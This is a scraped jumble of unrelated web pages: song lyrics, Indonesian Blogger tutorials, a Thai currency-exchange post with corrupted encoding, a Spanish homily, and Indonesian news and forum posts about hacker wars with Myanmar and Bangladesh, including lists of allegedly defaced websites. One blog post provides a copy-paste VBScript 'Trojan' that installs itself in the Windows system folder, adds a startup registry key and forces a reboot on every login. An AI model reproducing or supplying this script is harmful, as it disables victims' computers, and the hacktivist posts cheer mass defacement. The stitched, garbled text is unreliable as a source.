I'm out here on my own, an drifting all alone

If it doesn't show give it time

To read between the lines

'Cause I see the storm getting closer

And the waves they get so high

Seems everything we've ever known's here

Why must it drift away and die

I'll never find anyone to replace you

Guess I'll have to make it thru, this time - Oh this time

I knew the storm was getting closer

And all my friends said I was high

But everything was ever known's heere

I never wanted it to die

Scream adalah teknik vokal yang paling populer di subgenre dari heavy metal, dan dalam beberapa genre punk. Sementara intensitas, pitch, dan karakteristik bervariasi dari vokalis ke vokalis, scream vokal umumnya disertai musik berat, dan berkaitan dengan tema musik yang lebih agresif atau gaya.

Genre dimana Scream sering digunakan :

Modern Art Music


Punk Rock

Heavy Metal

Black Metal


Nu Metal

Industrial Metal

Groove Metal

Efek Beberapa vokalis ”scream” memiliki masalah dengan tenggorokan mereka, suara, pita suara, dan bahkan memiliki migrain dari scream ketika melakukan kesalahan. Beberapa vokalis dari band-band metal harus berhenti scream, tidak membuat musik sama sekali, atau bahkan menjalani operasi karena scream dengan cara-cara berbahaya yang merusak pita suara. Salah satu contoh adalah Sonny Moore. mantan personil band From First to Last, yang harus meninggalkan perannya sebagai vokalis di band karena pita suaranya rusak. Namun, dengan teknik yang tepat, scream dapat dilakukan tanpa kerusakan pada pita suara. Melissa Cross adalah guru vokal yang mengajarkan macam teknik vokal, dan telah mengajarkan banyak vokalis seperti Randy Blythe dan Angela Gossow.

Minggu, 03 Februari 2013

Elemen iframe digunakan untuk menampilkan sebuah halaman web di dalam sebuah halaman web.

1. Masuk ke Dasbor Blogger 2. Pilih Buat Entri Baru 3. Pilih Compose saat menulis isi atau pembahasan pada posting anda 3. Pilih HTML saat memasukkan script berikut <center><iframe src=" http://williamsarfat. blogspot. com/ " width=" 500 " height=" 200 "></iframe></center><a href="http://williamsarfat. blogspot. com/" target="_blank"></a> 4. Ganti http://williamsarfat. blogspot. com/ dengan alamat website yang akan ditampilkan, atur ukuran dengan merubah angka panjang dan lebar. Contoh:

Berikut ini tutorial cara membuat daftar isi pada blog:

1. Masuk ke Dasbor Blogger 2. Pilih Laman 3. Pilih Laman Baru 4. Pilih Laman Kosong

6. Masukkan script berikut:

<script src="https://sites. google. com/site/antahberantah1996/javascript/Daftar%20Isi. js"></script><script src=" http://williamsarfat. blogspot. com/ feeds/posts/default? max-results=900&amp;alt=json-in-script&amp;callback=loadtoc"></script><a href="http://williamsarfat. blogspot. com/" rel="dofollow" target="_blank"></a> 7. Ganti http://williamsarfat. blogspot. com/ dengan alamat blog/website anda 8. Beri judul laman anda lalu publikasikan. Demikianlah tutorial cara membuat daftar isi pada blog.

Sabtu, 02 Februari 2013

Nama warna didukung oleh semua browser, 147 nama warna didefinisikan dalam HTML dan CSS (17 warna standar ditambah 130 warna lebih). Berikut ini daftar nama dan kode warna pada HTML bersama dengan nilai-nilai heksadesimal mereka. Silahkan digunakan.


ผมกำลังจะไปพม่าครั้งแรก ใน วันจันทร์ที่ 28 มกราคม 2556 นี้ ก็เลยหาข้อมูลจากห้องบลูแพลนเน็ต และในเว็บต่างๆ ได้ข้อมูลมาพอสมควร

แล้วพอมาถึงเรื่องแลกเงินไปใช้ในพม่า ไปดูอัตราแลกเปลี่ยนของ Central Bank of Myanmar аё—аёµа№€ http://forex. cbm. gov. mm/index. php/fxrate มีอัตราแลกเปลี่ยนเงินบาทไทยด้วย а№ЂаёЈаё•а№ѓаё™аё§аё±аё™аё—аёµа№€ 18 аёЎ. аё„. 56 аё­аёўаё№а№€аё—аёµа№€ 1 аёљаёІаё — аё•а№€аё ­ 28.816 аё€а№ЉаёІаё” สำหรับดอลลาร์อเมริกา аё­аёўаё№а№€аё—аёµа№€ 1 USD аё•а№€аё ­ 858 аё€а№ЉаёІаё”

ซึ่งถ้าแลกจากซุปเปอร์ริชวันนี้ 29.95 аёљаёІаё — аё•а№€аё ­ 1 USD เอาเงินบาทแลกเงิน 1 USD ที่ไทย แล้วนำ 1 USD ไปแลกเงินพม่า 29.95 аёљаёІаё — = 858 аё€а№ЉаёІаё” หรือคิดเป็น 1 аёљаёІаё — = 28.64775 аё€а№ЉаёІаё” ซึ่งได้น้อยกว่าเรตที่เอาเงินบาทไปแลกเงินจ๊าดที่พม่าอีก และถ้าหากเอาเงินบาทไปแลก USD аё—аёµа№€аё˜аё™аёІаё„аёІаёЈа№ѓаё™а№„аё—аёў คิดแล้วก็จะยิ่งได้น้อยลงไปอีก

แต่ลองหาดูรีวิวดูกระทู้ต่างๆแล้ว ไม่เจอใครที่เอาเงินบาทไปแลกเงินที่พม่าเลย มีแต่แลกเป็น USD аёЃа№€аё­аё™ แล้วค่อยเอาเงิน USD ไปแลกที่พม่าอีกที ทั้งๆที่แลกได้เงินจ๊าดน้อยกว่า ยังไม่นับเรื่องความสะดวก аё—аёµа№€аё•а№‰аё­аё‡а№ЂаёЄаёµаёўа№Ђаё§аёҐаёІа№ЂаёЄаёµаёўаё„а№€аёІа№Ђаё”аёґаё™аё—аёІаё‡а№„аё›аё˜аё™аёІаё„аёІаёЈаё«аёЈаё·аё­аёЈа№‰аёІаё™а№ЃаёҐаёЃа№Ђаё‡аёґаё™ เพื่อแลกเงิน USD аё­аёµаёЃ

commax 18 มกราคม 2556 เวลา 14:05:18 น.


BREAKING NEWS. -------------------- Hacker Ancam Serang Situs-situs dari Indonesia "Indonesia tidak berhenti meretas situs-situs kami." Pesan terbuka dari peretas asal Bangladesh, Rotating Rotor. Muhammad Chandrataruna, Roger Wenas (Sulawesi Utara) | Senin, 29 Juli 2013, 17:04 WIB VIVAnews - Komunitas hacker atau peretas asal Bangladesh menyatakan akan menyerang situs-situs atau Website di Indonesia. Hal itu dikatakan para hacker pada grup terbuka Bangladesh GREY HAT Community di situs jejaring sosial Facebook. Komunitas itu mendiskusikan secara terang-terangan bahwa sasaran mereka saat ini adalah situs-situs Website berasal dari Indonesia. Di grup itu, para anggota menumpahkan kekecewaannya karena banyak hacker asal Indonesia yang banyak merusak situs-situs dari Bangladesh. Rotating Rotor, salah satu anggota group komunitas itu mengatakan, jika hacker Indonesia melakukan kesalahan besar dalam sejarah Internet mereka. Mereka juga telah meminta ribuan kali kepada para hacker di Indonesia untuk berhenti meretas situs-situs di Bangladesh, namun menurut Rotating, permintaannya itu tidak digubris. "Indonesia tidak berhenti meretas situs-situs kami. Kali ini saya akan membawa neraka ke situs-situs di Indonesia," ujarnya, saat bincang-bincang dengan VIVAnews melalui fasilitas chatting di Facebook. Ia menjamin, kurang lebih 24 jam orang Indonesia akan melihat tanda BD Gray Hat di seluruh dunia maya Indonesia. "Kami akan melakukan pertunjukan," janjinya. Saat ditelusuri VIVAnews, tautan yang diberikan Rotating untuk melihat bukti keseriusan mereka, salah satu situs di Indonesia beralamat pa-bawean. go. id telah berhasil ditembus. Tak tanggung-tanggung, mereka meninggalkan jejak bertulisan "Hacked by Ablaze Ever. BD Gray Hat Hacker". Saat VIVAnews mengonfirmasi, Rotating mengatakan, hacker - hacker asal Indonesia banyak melakukan aksi secara individu. "Hacker Indonesia banyak yang beraksi di luar komunitas, mereka jarang meninggalkan jejak komunitas mereka. Selain Bangladesh, mereka juga kerap meretas situs-situs di Indonesia sendiri," ujarnya. Setelah percakapan melalui chatting di Facebook berkisar 30 menit, Rotating langsung menghilang dan memblokir akun Facebook wartawan VIVAnews.

Serangan serempak telah dilakukan oleh Hacker Indonesia ke ISP dan website-website Myanmar, di karenakan ini adalah bentuk kepedulian Hacker Indonesia dengan apa yang telah di lakukan oleh Hacker Myanmar yang telah merusak website - website Indoensia. Hacker Indonesia berjuang untuk membelah MARTABAT, dan HARGA DIRI BANGSA INDONESIA yang telah di lecehkan oleh negara lain. Disaat 230 situs Indonesia bahkan lebih dihajar oleh Myanmar, siapakah yang membalas ? Apakah polisi cyber Indonesia. Apakah pemerintah Indonesia. Tidak ! Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakukan gerakan OP Myanmar. Tanpa digaji pun hacker Indonesia akan bahu membahu membalas serangan yang dilakukan oleh Myanmar. Seperti yang kita ketahui, Myanmar sangat mudah melakukan aksi deface masal ke situs Indonesia karena mereka difasiliatsi untuk itu. Maksudnya. Ya, situs Indonesia sangat banyak. Jelas sangat mudah jika hanya mencari bug dan kemudian melakukan symlink. Di Indonesia ada google. co. id yang memudahkan mereka melakukan scan terhadap web target. Bandingkan dengan mereka. Situs Myanmar sedikit. Di sana tidak ada situs google. Sangat sulit jika harus masuk lewat celah keamanan. Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs-situs Myanmar secara bersama-sama salah satunya situs http://myanmarbizdirectory. com/

Beberapa serangan telah di lancarkan ke negara Myanmar, di bawah ini list website Myanmar yang sudah pernah down, di deface, hacked, dan 404 di tangan Hacker Indonesia :

ais. gov. mm amd. moai. gov. mm asiaholidays. com. mm asialight. com. mm asianskytravels. com asiantrails. com. mm asianwingsairways. com. mm cbm. gov. mm city. com. mm cnj. net. mm commerce. gov. mm consultancy. com. mm cosco. com. mm ct. com. mm daewooenp. com. mm dar. moai. gov. mm dca. gov. mm earth. com. mm eleven. com. mm elibrary. com. mm enjoy. net. mm forex. cbm. gov. mm forum. myanmarfrangipanitours. com geocomp-myanmar. net. mm globalnet. com. mm globalsongroup. com gmrockentgroup. com hantharwaddy. net. mm hotel-tourism. gov. mm indiaembassy. net. mm industry2.gov. mm irdmyanmar. gov. mm irrigation. gov. mm irrigation. gov. mm isy. net. mm kmd. com. mm madb. moai. gov. mm mail4u. com. mm mailtx. teleport. net. mm marychapman-mm. org mbl. com. mm mcpa. org. mm mes. org. mm micde. moai. gov. mm mining. com. mm mit. com. mm mmmc. edu. mm mnped. gov. mm moc. gov. mm mofr. gov. mm mosports. gov. mm mot. gov. mm mpa. gov. mm mprlnet. com. mm mptmail. com. mm mptmail. net. mm mptsat. com. mm mwd. com. mm myanmar. com. mm myanmar. gov. mm myanmar. net. mm myanmarbizdirectory. com myanmarfishexporter. com myanmarnlp. org. mm myanmaronline. com. mm myanmaronline. net. mm myanmartradenet. com. mm myanmartravelguides. com myanmatimber. com. mm myanpay. net. mm myantel. net. mm myringtune. com. mm myringtuneonline. com. mm nebula. com. mm nestlemyanmar. com. mm nic. net. mm npt. net. mm ns4.nic. net. mm opal. net. mm people. com. mm planet. com. mm pomail. gov. mm president-office. gov. mm primeboss. com. mm redlink. net. mm redlinkcare. net. mm royalgoldentortoise. com royalwhisky. net. mm rpmm. com. mm rubyland. com. mm sb. gov. mm sd. moai. gov. mm spa. com. mm sunfar. com. mm super. com. mm talentsnmodels. com talisman. com. mm tawwincentre. com. mm teleport. net. mm thaiairways. com. mm tinaungzawtrading. com tinmoelwin. com tnk. net. mm todaygroup. com. mm tourmandalay. com. mm ucsb. gov. mm umfcci. com. mm ummg. edu. mm webasaservice. com webmail. mm. com wimaxmail. net. mm wpiteam. net. mm wrud. moai. gov. mm yangtse. com. mm yatanarponca. com. mm yau. moai. gov. mm yomabank. com. mm zte. com. mm

Terserah mau di apain nih thread ane, asal jangan di aja .

ane cm sdkit berbagi informasi aja

waduh perang hacker di mulai nih

Quote: Original Posted By fuck***you ► waduh perang hacker di mulai nih

cepet jg ente gan

ya smpai skrg masih berlangsung gan matabelo

yg menang siapa yaaa.

waduhhh. ane kagak ngerti apa-apa gan.

dah pernah baca trit kek gini di lounge

seharusnya damai saja juragan

Quote: Original Posted By rusaba ► dah pernah baca trit kek gini di lounge

Repost mungkin trit nye gan,, Tp peperangan masih berlanjut smpai skrg ( Karna ane update info trus ).

Bhkan makin panas.

Quote: Original Posted By mbewahh ► repost jim

Liat tnggal di isi trit atas gan.

lho beritanya bangladesh kok nyerangnya myanmar? ts koplak

Quote: Original Posted By gas_2305 ► lho beritanya bangladesh kok nyerangnya myanmar? ts koplak

Yg myanmar itu sbgai contoh gan.. Yg bangladesh yg sdg brlgsung smpai skrg.

#EucaristíaMensual Con el propósito de darle y poner el corazón en Dios y el reconocimiento de los pecados, para que Jesucristo entregue su perdón, la Gran Eucaristía Mensual celebrada el sábado pasado en la Plaza de Banderas, con el padre Javier, muchas vidas fueron renovadas en el Espíritu Santo, porque no hay alimento más renovador y fortificante que el Pan de Vida dado por el Cuerpo de Cristo y el Vino de Salvación que es su Sangre.

En esta oportunidad, la enseñanza entregada de acuerdo con la lectura del Evangelio según San Mateo, cuyo mensaje sigue siendo el amor uno a los otros como lo ha hecho el Padre Celestial, el padre Javier entrega tres ideas o pensamientos para todos los asistentes en este camino de cuaresma hacia la Pascua del Señor.

1. La alianza con Dios. una alianza que se da entre los hombres y Dios en la cual existen cuatro propuestas. “ Ser Dios para nosotros”, deja claro que no habrá paso para otros dioses. En segundo lugar , “Podrás conocer y andar en mis caminos” . En tercera medida, “ Guardaremos sus mandatos y leyes” . es decir no vivir en rebeldía ni en desobediencia ante Él.

En cuarto lugar , “tú podrás escuchar mi voz” . Aquí Dios da la posibilidad de escuchar su voz, y así poder llegar más fácil a Él. “Dentro de la alianza con Dios nosotros podemos llegar a ser el pueblo del Señor, a caminar en sus caminos y escuchar su preciosa voz que nos da la dirección y nos llevará a la bendición. Esa es la propuesta de Dios”.

Una decisión que se debe tomar porque la alianza exige una respuesta de la contraparte, hacer un compromiso el cual consiste en cumplir con lo que Dios manda y darle gusto en eso. En esta alianza, por supuesto, el hombre hace su propuesta en muestra de su amor a Dios. En primer lugar, el pueblo le propuso: “Dios, Tú serás mi Dios y yo para Ti seré tu pueblo y serás mi salvador”. Como segunda medida, que “ yo pueda guardar tus mandamientos, que me eleves en gloria y que yo sea tu pueblo santo consagrado a Ti”. Una alianza que se ha renovado, de acuerdo con el padre Javier, “una alianza que se ha perfeccionado en la suprema alianza que se ha hecho en Jesucristo nuestro Señor; por Jesucristo, verdaderamente, somos el pueblo de Dios que somos nosotros”.

Entonces, para vivir esta cuaresma de verdad, es necesario vivir la alianza con Dios, renovarla y actualizar el pacto con el Señor.

2. Superar la dualidad del corazón. En esta idea, se entrevé que no se puede odiar y amar a la vez. La solución es perdonar para que cada corazón sólo exista amor y humildad. No se trata de amar al prójimo y odiar al enemigo. Dios quiere un corazón unificado y limpio de pecado , “necesidad de conversión porque Dios no quiere un corazón dividido, sino un corazón unificado en la presencia y en el amor de Dios”.

Al lograr eso, Jesús dice que se está haciendo lo extraordinario y siempre va a pedir a su pueblo lo extraordinario: amar a los enemigos, perdonar las ofensa, servir a todo el mundo y de esa manera se parecerá cada vez más a Jesús de Nazaret.

3. Ser perfectos hijos como lo es el Padre nuestro Señor . se trata de ver por todos lados el rostro del amor de Dios, tener presente a Cristo en todo. Una Perfección que se ha de conseguir cumpliendo con la alianza, amando a todos por igual y por medio de la oración

Y así, con la absoluta presencia del Espíritu Santo, se seguirá llevando un camino de conversión en este tiempo de Cuaresma.

Waduh. lagi ngomongin Virus nih,,hahaha,, sekarang yang mau ane bahas yaitu cara bikin Virus Trojan. wah,,lumyan serem juga nih virus,,sampe'' kalo komputer kita kena bisa'' mampus dah kita,,wkwakakakwekwak,

okwe langsung aja gini caranya.

Nama Aslinya Trojan Horse Kalo Mau Penjelasannya Klik Pengertian Virus . Dan Seperti Komputer Saya Ini Penuh Virus Worm . Sengaja Biar Jadi Pabrik Virus ckckck. Oke Begini Cara Membuatnya Mudah Kok Notepad Lagi hoho .

1. Buka Notepad | All Program > Notepad 2. Copy Dan Pate Script Berikut Ke Notepad !

set FSobj=CreateObject(“Scripting. FileSystemObject”) set sysDir = FSobj. GetSpecialFolder(1) createRegKey “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dlRB”,sysDir&”\dlRB. vbs” sub createRegKey(regKey, regVal) set regEdit = CreateObject(“WScript. Shell”) regEdit. RegWrite regKey, regVal end sub set generateCopy=FSobj. CreateTextFile(sysDir+”\dlRB. vbs”) generateCopy. close set newFile = FSobj. OpenTextFile(WScript. ScriptFullname,1) setFile() fixedCode=replace(fileData, chr(94),”"”") set procreateCopy=FSobj. OpenTextFile(sysDir+”\dlRB. vbs”,2) procreateCopy. write fixedCode procreateCopy. close rebootSystem() function setFile() fileData=”rem – ^dlRB^ by D. L.” &vbcrlf& _ “strComputer = ^.^ ” &vbcrlf& _ “Set objWMIService = GetObject(^winmgmts:^ _ ” &vbcrlf& _ “& ^ !\\^ & strComputer & ^\root\cimv2^)” &vbcrlf& _ “Set colOperatingSystems = objWMIService. ExecQuery _ ” &vbcrlf& _ “(^Select * from Win32_OperatingSystem^)” &vbcrlf& _ “For Each objOperatingSystem in colOperatingSystems” &vbcrlf& _ “ObjOperatingSystem. Reboot()” &vbcrlf& _ “Next” end function function rebootSystem() strComputer = “.” Set objWMIService = GetObject(“winmgmts:” _ & “ !\\” & strComputer & “\root\cimv2″) Set colOperatingSystems = objWMIService. ExecQuery _ (“Select * from Win32_OperatingSystem”) For Each objOperatingSystem in colOperatingSystems ObjOperatingSystem. Reboot() Next end function

3.Kalau Sudah Simpah Filenya Dengan Extensi. VBS contoh JurigWarnet. VBS. Nyimpennya Harus All Files 4. Jangan Di Klik kalau Itu Komputer Pribadi Gw Gak Tanggung Jawab Kalau Keluar 1000 File Aneh

Catatan. Saya Tidak Bertanggung Jawab Atas Apa Yang Anda Lakukan Ini Hanya Materi Pembelajaran Sekian Cara Membuat Virus TROJAN. Semoga Bermanfaat Untuk Agan Sekalian ,

Wahyu Himawan Minggu, Juni 16, 2013 No comments

Assalamualaikum. apa kabar gan. bukan sok-sokan jagi mepes cuma mau bantu sesama newbie aja nih ane punya vuln webdav terbaru langsung disedot aja ya,,hehehe,, good luck kawan.

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Wahyu Himawan Jumat, Juni 14, 2013 No comments

Kunci sukses seseorang itu selain dari kerja keras dan disiplin adalah mengetahui kemampuan diri yang dimiliki untuk dikembangkan. Setelah tahu mana saja kelebihan yang bisa dikembangkan, maka dengan mudah jalan akan terbuka dan ditemukan. Nah, kelebihan tersebut ternyata sangat berhubungan erat dengan kerja otak kiri dan otak kanan. Mereka yang cenderung bekerja dengan menggunakan otak kiri sangat cerdas dalam hal menyusun dan penghitungan. Cocok bekerja di bidang pekerjaan yang berhubungan dengan penghitungan serta menyusun. Sedangkan mereka yang cenderung bekerja dengan otak kanan, lebih banyak gemar praktek dan bekerja di bidang yang berkaitan dengan seni. Apabila saat ini Anda sudah bekerja namun merasa tidak nyaman dengan pekerjaan Anda, bisa jadi Anda salah memilih pekerjaan. Yuk cari bidang pekerjaan sesuai dengan cara kerja otak. Jawab beberapa pertanyaan berikut yang akan membantu Anda menentukan apakah Anda tipe si otak kanan atau si otak kiri.

1. Jika Anda diberi tugas untuk mengarang, maka yang akan Anda tulis adalah. a. Menjabarkan sistem planet dan peredarannya b. Menulis cerita bagaimana seekor gajah dapat menyelamatkan dunia

2. Menurut teman Anda, Anda adalah sosok yang. a. Akademis dan terkenal selalu disiplin b. Sosok yang populer dan ramai

3. Di pagi hari, Anda memilih pakaian berdasarkan. a. Apa saja yang penting praktis b. Seperti yang telah direncanakan semalam, karena ada acara yang spesial harus didatangi

4. Kalau ada dua pekerjaan yang menanti, maka Anda akan. a. Menyelesaikan satu terlebih dahulu sampai sempurna, baru menyelesaikan yang lain b. Mengerjakan yang satu, apabila bosan mengerjakan yang lain, dan kembali ke pekerjaan semula. Yang penting tidak bosan.

5. Dalam produksi film, kira-kira Anda akan berperan sebagai apa? a. Pengarah gaya b. Sebagai artisnya dong

6. Anda baru saja memenangkan sebuah tiket liburan selama seminggu ke pantai, Anda akan. a. Mengajak serta kedua orang tua dan keluarga b. Berlibur bersama teman-teman saja

7. Seseorang baru saja mengatakan bahwa Anda ini terlalu mementingkan penampilan. Maka Anda berpikir. a. Masak sih? segundo. Iya mungkin iya. Karena penampilan kan juga penting.

8. Dalam soal pilihan ganda, Anda akan. a. Menelaah jawaban satu per satu kemudian baru memilih b. Bingung memilih mana yang benar

9. Apabila Anda menonton film yang mengharukan maka Anda akan a. Berkaca-kaca b. Berusaha keras untuk tidak menangis

10. Saat beradu pendapat dengan orang lain Anda akan a. Mengeluarkan semua fakta yang ada b. Berusaha memanipulasi keadaan dan membuatnya lebih dramatis Cek jawaban Anda di sini. Apabila jawaban Anda"

Kebanyakan A: Si Tipe Otak Kiri Anda adalah tipe otak kiri, di mana Anda sosok pemikir yang praktis dan tak suka hal-hal yang muluk-muluk. Anda adalah tipe orang yang dikagumi karena kedisiplinan Anda. Anda sangat teliti dan tidak suka hal-hal atau barang yang berantakan. Anda akan menyelesaikan semua problem yang ditemui satu per satu terlebih dahulu sebelum menjamah problem lain. Anda sangat pandai dalam hal menganalisa serta menemukan jawaban akan sebuah problem.

Kebanyakan B: Si Tipe Otak Kanan Anda sosok yang ceroboh dan seringkali dibuat bimbang saat berhadapan dengan banyak pilihan. Anda sering kurang yakin dan kurang tegas, serta mudah tergiur rayuan. Anda lebih senang berangan-angan dan cepat bosan. Gemar mendengarkan cerita fiksi dan khayalan serta menyukai hal-hal yang berkaitan dengan seni. Anda juga suka tantangan serta kejutan. Anda orang yang moody, dan tidak suka berkutat pada satu hal saja saat mengerjakan sesuatu. Nah, manakah tipe Anda?


Assalamualaikum. Selamat Siang, Mungkin dari akang dan teteh masih pada bingung ya bagaimana cara daftar ke SMKN 1 CMH ini, di liat dati page Sekolah yang penuh dengan pertanyaan-pertanyaan yang sama,

Pendaftaran mulai di buka tanggal 10 Juni. di Situs Resmi PPDB SMKN 1 Cimahi . Web Masih dalam Proses Peng-updetan. Sampai saat ini situs masih dalam masa percobaan. Pada tanggal 9 data akan di hapus dan akan di Updet lagi tanggal 10. jadi siap - siap aja tanggal 10. karna percuma kalau daftar sekarang, karna nanti data akan di hapus

Alur Pendaftaran (menurut Tahap Pendaftaran Tahun Sebelumnya 2012-2013): 1. Pendaftaran Secara Online. Siswa harus terlebih dahulu mendaftakan dirinya di Situs resmi PPDB SMKN 1 Cimahi. Dan dalam tahap ini, siswa akan di minta untuk mengisi data dirinya. seperti Biodata, Nilai Rapot, Keterangan Sekolah, Minat Masuk Jurusan, dll.

2. Menyerahkan Document Administrasi Setelah tahap 1, siswa akan di minta untuk mendownload softcopy formulir, dan format isian yang lain ( Nilai-nilai, Surat izin Sekolah, dll), setelah di isi. Document dalam bentuk hardcopy harus dikirimkan ke pihak sekolah SMKN 1 CIMAHI beserta dengan document lain ( fc Akte, fc Surat Lulus, fc SKKB, dll ).

3. Penyeleksian Pertama bagian Administrasi Dari data siswa yang telah di kumpulkan akan di seleksi lagi. mulai dari persyaratan kesehatan, persyaratan nilai, dll. bisa dilihat persyaratan di http://ppdb. smkn1-cmi. sch. id/persyaratan Setelah tahap ini, akan di umumkan kembali, apakah sang pendaftar lolos seleksi tahap 1 atau tidak, di situs PPDB SMKN 1 Cimahi. dan biasanya siswa akan di kenakan biaya, yang di transfer langsung k rekening sekolah. sebelum melaksanakan testing

4. Tahap Testing ( Ujian Masuk ) Untuk melihat Kemampuan Asli Calon siswa, pihak sekolah menggunakan system testing. untuk meminimalisir adanya kecurangan nilai. Jika Calon siswa sudah lolos dari tahap sebelumnya, Pendaftar akan di beri informasi tentang Testing akan di mulai kapan.

5. Penyeleksian Bagian Kedua Penyeleksian tahap ini. dilihat dari nilai testing yang sudah pendaftar laksanakan sebelumnya, Nilai yang di bawah rata-rata di pastikan gugur di tahap ini. Dan tidak berarti yang nilai di atas rata-rata pun bisa di terima. Karna pihak sekolah harus melihat dari nilai dan pilihan jurusan yang pendaftar pilih. contohnya. si A memilih untuk masuk jurusan RPL, TKJ, dan TP4. Nilai si A tidak memadai untuk masuk ke jurusan RPL, maka akan dilihat ke pilihan berikutnya, ternyata si A memadai untuk masuk ke jurusan TKJ, tapi ga berhenti dari situ. akan dilihat dari ketersediaan kursi di jurusan tersebut, apa bila masih ada, si A akan di terima di jurusab TKJ, tapi jika Penuh akan dilihat dari pilihan ke 3, apakah memadai atau tidak. sama seperti di pilihan kedua, jika tidak ada bangku di jurusan tersebut, maka secara otomatis sang Pendaftar tidak di terima.

Setelah tahap ini selesai. siswa pun akan di beri informasi apakah dia di terima atau tidak, dan di terima di jurusan apa.

6. Daftar Ulang. Bagi Siswa Yang di terima akan mendapatkan surat tanda di terima, yang akan di sertakan saat daftar ulang ke jurusannya masing-masing beserta dokumen-dokumen lain yang mungkin saja di butuhkan .

tahap berikutnya akan di jelaskan kembali saat proses pendaftaran sudah berlangsung.

Semoga bermanfaat. D Good Luck . Semoga Dapat di terima di sekolah yang di Ingin kan

Posted by dendi gustami Rabu, 31 Juli 2013 0 comments

Situs resmi Badan Reserse Kriminal Mabes Polri diretas, Rabu 31 Juli 2013. Situs yang beralamat di www. bareskrim. polri. go. id berlatar warna hitam dan terdapat lambang garuda dengan latar bendera merah putih.

Hacker yang menamakan dirinya "pra5astea" ini sepertinya tidak berkenan dengan pernyataan Kabareskrim Mabes Polri Komjen Pol Sutarman beberapa waktu lalu yang mengklaim Bareskrim Polri tidak gentar kepada para hacker karena pihaknya percaya telah memiliki sistem keamanan yang kuat.

Selain gambar garuda dengan latar bendera merah putih, tampilan situs juga ditulis berbagai kalimat. Berikut tulisannya:









SAYA "pra5astea" MEMOHON MAAF ATAS KELANCANGAN INI. DEMI KATA-KATA DISEBUAH SUMBER INI [dia menuliskan link berisi alamat url sebuah situs media online]

Posted by dendi gustami 0 comments

obeng di sebut juga dengan icon Quick Edit atau dengan kata lain untuk mengedit secara cepat. Fungsinya jika kita ingin melakukan editing terhadap elemen tersebut tinggal klik saja icon nya dan kita bisa langsung mengeditnya. Icon tersebut sebenarnya hanya bisa di lihat apabila kita sedang login ke blogger saja, sedangkan pengunjung yang lain tidak bisa melihat icon tersebut. Namun ternyata ada beberapa blogger yang tidak suka dengan kehadiran icon tersebut dan ingin menghapusnya. Apakah kita bisa menghapus icon tersebut? Jawabannya tentu saja bisa, dan sangatlah gampang karena kita hanya melakukan perintah agar icon itu tidak di munculkan dengan hanya manambahkan sedikit kode pada kode CSS template kita. Ingin tahu kodenya seperti apa, nih ini dia kodenya, coba pasang saja di Style Sheet CSS anda :

Mudah sekali bukan? atau masih bingung. Ok deh, ini dia cara lengkapnya :

Login ke blogger dengan ID anda tentunya. Klik Tata Letak. Klik tab Edit HTML. Cari kode seperti ini :

Copy paste kode berikut persis di atas kode yang tadi :

Klik tombol Simpan template. Selesai.

Posted by dendi gustami 0 comments

hay sob. pada kesempatan sekarang ini saya mau ngepost tentang cara merubah tampilan facebook di google chrome, ya facebook adalah media sosial yang bisa diakses siapa saja dan dimana saja asalkan ada internet nya heheh. apa agan agan semua bosan dengan tampilan facebook yang itu itu saja nah sekarang saya mau kasih tau CARA MENGGANTI TAMPILAN FACEBOOK. tak usah menunggu lama lagi saya akan memulai nya . 1) pertama dan utama sekali agan harus mempunyai facebook. 2) nah yang selanjutnya agan bisa langsung menggunjungi website nya Klik disini

3) sebelum menginstal klik pilih salah satu gambar lalu klik "To use these themes, install Facebook Theme Creator, then refresh this page." yang terdapat di bagian atas, seperti gambar dibawah ini.

4) maka akan muncul tampilan. pili ADD maka secara otomatis link akan merefresh serta mendownload file. 5) tunggu hingga proses download selesai maka software nya akan secara otomatis terinstal di Google Chrome agan . 6) lalu agan masuk ke menu extensions "chrome://extensions/ " 7) setelah masuk menu extensions, klik visit website.

8) maka anda akan di tujukan pada site tadi , 9) pilih salah satu diantaranya lalu klik instal lalu klik ok

10) lihat Facebook anda. tapi sebelum nya harap Facebook di refresh dahulu . nah seperti ini lah contoh hasil nya

11) jika anda menggunakan browser selain Google chrome anda juga bisa memilih pilihan di sudut kiri bawah

NB: program ini hanya kita yang dapat melihatnya orang lain tidak dapat melihat . Saran. gunakan hanya pada 1 PC. Contoh Laptop pribadi. dan PC pribadi Jika diwarnet saya tidak menjamin Program dapat berjalan.

terimakasih telah mengunjungi mydendigers. blogspot. com dan selamat menikmati

Indonesian Hackers Vs Bangladesh Hackers. Muslim Vs Muslim. Who Wins ? - Seperti yang kita tahu. Hacker Bangladesh Mengancam akan menyerang situs situs indonesia apabila Hacker Indonesia tidak berhenti menyerang situs mereka. saya sendiri juga tidak tau siapa yang memulai dan apa penyebab terjadinya insiden ini. namun jika melihat dampak yang terjadi berikut adalah Efek dari Indonesia Vs Bangladesh :

79 Bangladesh Site Hacked By Indonesian Hacker [ Update 30 july 2013. 02.00 WIB ]

1. http://www. bab. org. bd/ 2. http://www. ntl. gov. bd/ 3. http://www. bab. org. bd/ 4. http://viewsandfuse. com/ 5. http://mssbd. org/ 6. http://sjbbd. net/ 7. http://martbangladesh. com/ 8. http://www. desiremovie. com/ 9. http://grngroup. net/ 10. http://sjbbd. net/ 11. http://www. srpbd. com/ 12. http://2mr-globalbd. com/ 13. http://shokherhat. com/ 14. http://shopnochuragroup. com/ 15. http://www. ds. gov. bd/index. php? option=com_content&view=frontpage&Itemid=1&lang=en 16. http://www. bangladeshgurdwaras. org/ 17. http://www. cabinet. gov. bd/Hacker_Sakit_Hati/ 18. http://shilpakala. gov. bd/ 19. http://artsbangladesh. com/. 20. http://ferb. com. bd/ 21. http://glclbd. com/ 22. http://banglaschool24.com/ 23. http://www. ntl. gov. bd/HsH. gif 24. http://www. galaxyexpress-bd. com/ 25. http://www. hmsfashionbd. com/ 26. http://link3.net. bd/citycell/mainsite/images/me. php 27. http://alifcity-bd. com/ 28. http://viewsandfuse. com/ 29. http://popularctg. com/bdgh. html 30. http://www. foodex. com. bd/administrator/ 31. http://ppdl. com. bd/ 32. http://bddomain. com. bd/

